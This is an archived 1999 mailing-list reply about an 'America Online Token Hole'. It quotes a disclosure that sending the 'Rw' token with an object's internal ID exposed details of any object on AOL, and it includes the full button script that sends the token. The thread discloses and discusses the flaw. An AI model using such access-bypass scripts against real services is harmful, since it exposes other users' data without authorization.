Re: America Online Token Hole

From: John Schuster (grannyat_private)
Date: Mon Jul 12 1999 - 09:05:49 PDT

    I had contacted the person who posted this information.  It
    seems that AOL has contacted him and he refuses to talk
    about this if you ask about it.

    Does anyone have any information on how to make your own
    programmable buttons for aol?

    granny

    About a year ago, I found out that by sending the "Rw" token
    to the AOL host while signed on along with the object's
    internal id as arg, any user could get detailed info about
    any object on the system.

    man_start_object < trigger, "" >
    mat_relative_tag < 22 >
    act_replace_select_action
    <
    uni_start_stream
    sm_send_token_arg <"Rw", INTERNAL ID HERE>
    uni_end_stream
    <FONT COLOR="#222255">> </FONT>
    mat_precise_x < 0 >
    mat_precise_y < 226 >
    mat_font_sis < small_fonts, 7, normal>
    mat_art_id < 1-0-21184 >
    mat_bool_default < yes >
    man_end_object

    comments questions..   <A
    HREF="mailto:mackkat_private">mackkat_private</A>